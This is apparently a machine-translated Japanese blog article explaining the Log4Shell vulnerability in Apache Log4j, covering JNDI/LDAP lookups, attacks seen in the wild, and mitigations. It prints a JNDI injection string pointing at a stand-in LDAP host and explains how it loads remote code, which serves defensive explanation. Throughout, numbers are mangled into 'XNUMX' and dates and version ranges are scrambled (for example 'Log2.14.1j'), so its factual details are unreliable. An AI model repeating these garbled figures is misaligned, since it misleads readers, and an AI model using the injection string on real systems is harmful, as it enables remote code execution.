目次[隠す][見せる]
2021 年 XNUMX 月下旬、サイバーセキュリティに対する重大な脅威が判明しました。 このエクスプロイトは、世界中の何百万ものコンピュータ システムに影響を与える可能性があります。
これは、Log4j の脆弱性と、見落とされた設計上の欠陥により、どのようにして世界中のコンピューター サービスの 90% 以上が攻撃にさらされたのかについてのガイドです。
Apache Log4j は、Apache Software Foundation によって開発されたオープンソースの Java ベースのログ ユーティリティです。 元々は 2001 年に Ceki Gülcü によって作成され、現在は Apache Software Foundation のプロジェクトである Apache Logging Services の一部となっています。
世界中の企業が Log4j ライブラリを使用して、アプリケーションでのログ記録を有効にしています。 実際、Java ライブラリは非常に広く普及しており、Amazon、Microsoft、Google などのアプリケーションで見つけることができます。
ライブラリが目立つということは、コードに潜在的な欠陥があると、何百万ものコンピュータがハッキングの危険にさらされる可能性があることを意味します。 24 年 2021 月 XNUMX 日、 クラウドセキュリティ アリババの研究者が恐ろしい欠陥を発見しました。
Log4Shell としても知られる Log4j の脆弱性は、2013 年から気づかれずに存在していました。この脆弱性により、悪意のある攻撃者は、Log4j を実行している影響を受けるシステム上でコードを実行することができました。 9年2021月XNUMX日に公表されました
業界の専門家は、Log4Shell の欠陥を「 最近の記憶にない最大の脆弱性.
脆弱性が公開されてから XNUMX 週間で、サイバーセキュリティ チームは数百万件の攻撃を検出しました。 研究者の中には、XNUMX 分間に XNUMX 回を超える攻撃を観察した人もいます。
システムを教えてください。
Log4Shell がなぜ危険なのかを理解するには、LogXNUMXShell の機能を理解する必要があります。
Log4Shell の脆弱性により、任意のコードが実行される可能性があります。これは基本的に、攻撃者がターゲット マシン上で任意のコマンドまたはコードを実行できることを意味します。
これはどのようにして実現されるのでしょうか?
まず、JNDI とは何かを理解する必要があります。
Java Naming and Directory Interface (JNDI) は、Java プログラムが名前を介してデータとリソースを検出および検索できるようにする Java サービスです。 これらのディレクトリ サービスは、開発者がアプリケーションを作成するときに簡単に参照できるように整理されたレコードのセットを提供するため、重要です。
JNDI は、さまざまなプロトコルを使用して特定のディレクトリにアクセスできます。 これらのプロトコルの XNUMX つは、Lightweight Directory Access Protocol (LDAP) です。
文字列をログに記録する場合、 ログ4j 次の形式の式に遭遇したときに文字列置換を実行します。 ${prefix:name}
.
たとえば、 Text: ${java:version}
テキスト: Java バージョン 1.8.0_65 として記録される場合があります。 この種の置き換えは一般的です。
次のような表現も可能です Text: ${jndi:ldap://example.com/file}
これは、JNDI システムを使用して、LDAP プロトコルを通じて URL から Java オブジェクトをロードします。
これにより、その URL からのデータがマシンに効果的にロードされます。 潜在的なハッカーはパブリック URL 上で悪意のあるコードをホストし、Log4j を使用するマシンがそのコードを記録するのを待つ可能性があります。
ログ メッセージの内容にはユーザーが制御するデータが含まれるため、ハッカーは、制御する LDAP サーバーを指す独自の JNDI 参照を挿入することができます。 これらの LDAP サーバーには、脆弱性を利用して JNDI が実行できる悪意のある Java オブジェクトが大量に存在する可能性があります。
さらに悪いことに、アプリケーションがサーバー側アプリケーションであるかクライアント側アプリケーションであるかは関係ないことです。
ロガーが攻撃者の悪意のあるコードを読み取る方法がある限り、アプリケーションは依然として悪用される可能性があります。
影響を受けるのは誰ですか?
この脆弱性は、バージョン 4 から 2.0 までの APache Log2.14.1j を使用するすべてのシステムとサービスに影響します。
複数のセキュリティ専門家は、この脆弱性は Java を使用する多くのアプリケーションに影響を与える可能性があるとアドバイスしています。
この欠陥は、Microsoft が所有する Minecraft ビデオ ゲームで初めて発見されました。 Microsoftは、リスクを防ぐためにJava版Minecraftソフトウェアをアップグレードするようユーザーに呼び掛けている。
サイバーセキュリティ・インフラセキュリティ庁 (CISA) の局長であるジェン・イースタリー氏は、ベンダーは次のように述べています。 重大な責任 エンドユーザーが悪意のある攻撃者によってこの脆弱性を悪用されるのを防ぎます。
「ベンダーはまた、自社の製品にこの脆弱性が含まれていることをエンドユーザーに知らせ、ソフトウェアのアップデートを優先する必要があることをエンドユーザーに確実に伝えるために、顧客とコミュニケーションをとる必要があります。」
伝えられるところによれば、攻撃はすでに始まっているという。 サイバーセキュリティ ソフトウェアを提供する企業であるシマンテックは、さまざまな数の攻撃リクエストを観察しています。
研究者が検出した攻撃の種類の例をいくつか示します。
- ボットネット
ボットネットは、単一の攻撃者の制御下にあるコンピューターのネットワークです。 これらは、DDoS 攻撃の実行、データの窃盗、その他の詐欺に役立ちます。 研究者らは、Log4j エクスプロイトからダウンロードされたシェル スクリプトで Muhstik ボットネットを観察しました。
- XMRig マイナー トロイの木馬
XMRig は、CPU を使用して Monero トークンをマイニングするオープンソースの暗号通貨マイナーです。 サイバー犯罪者は人々のデバイスに XMRig をインストールし、知らないうちに処理能力を利用できるようにします。
- コンサリ ランサムウェア
ランサムウェアとは、次の目的で設計されたマルウェアの一種を指します。 ファイルを暗号化する コンピューター上で。 その後、攻撃者は、暗号化されたファイルへのアクセスを返す代わりに、支払いを要求する可能性があります。 研究者は、Log4Shell 攻撃で Khonsari ランサムウェアを発見しました。 これらは Windows サーバーをターゲットとし、.NET フレームワークを利用します。
次に何が起こる?
専門家は、Log4J の脆弱性によってもたらされた混乱を完全に修正するには、数か月、場合によっては数年かかる可能性があると予測しています。
このプロセスには、影響を受けるすべてのシステムをパッチ適用済みのバージョンで更新することが含まれます。 これらすべてのシステムにパッチが適用されたとしても、サーバーが攻撃にさらされる可能性があるバックドアがハッカーによってすでに追加されている可能性があるという差し迫った脅威がまだあります。
その他にもたくさんのグーグルの 解決策と緩和策 アプリケーションがこのバグによって悪用されるのを防ぐために存在します。 新しい Log4j バージョン 2.15.0-rc1 では、この脆弱性を軽減するためにさまざまな設定が変更されました。
JNDI を使用するすべての機能はデフォルトで無効になり、リモート検索も制限されます。 Log4j セットアップでルックアップ機能を無効にすると、悪用される可能性のあるリスクを軽減できます。
Log4j の外でも、オープンソースの悪用を防ぐためのより広範な計画が依然として必要です。
XNUMX月初め、ホワイトハウスは次の報告書を発表した。 行政命令 国家のサイバーセキュリティを向上させることを目的としていました。 これには、アプリケーションの構築に必要なすべての項目のリストを含む本質的に正式な文書であるソフトウェア部品表 (SBOM) の規定が含まれていました。
これには、次のような部品が含まれます。 オープンソース 開発に使用されるパッケージ、依存関係、および API。 SBOM のアイデアは透明性を高めるのに役立ちますが、本当に消費者に役立つのでしょうか?
依存関係のアップグレードは非常に面倒な場合があります。 企業は、代替パッケージを見つけるために余分な時間を浪費する危険を冒すことなく、罰金を支払うことを選択できます。 おそらく、これらの SBOM は、次の場合にのみ役に立ちます。 スコープ さらに制限されます。
まとめ
Log4j の問題は、組織にとって単なる技術的な問題ではありません。
ビジネス リーダーは、自社のサーバー、製品、またはサービスが自社で保守していないコードに依存している場合に発生する可能性のある潜在的なリスクを認識しておく必要があります。
オープンソースやサードパーティのアプリケーションに依存することには、常にある程度のリスクが伴います。 企業は、新たな脅威が明らかになる前に、リスク軽減戦略を策定することを検討する必要があります。
Web の多くは、世界中の何千人ものボランティアによって保守されているオープンソース ソフトウェアに依存しています。
ウェブを安全な場所に保ちたいのであれば、政府や企業はオープンソースへの取り組みやサイバーセキュリティ機関への資金提供に投資すべきである。 CISA.
コメントを残す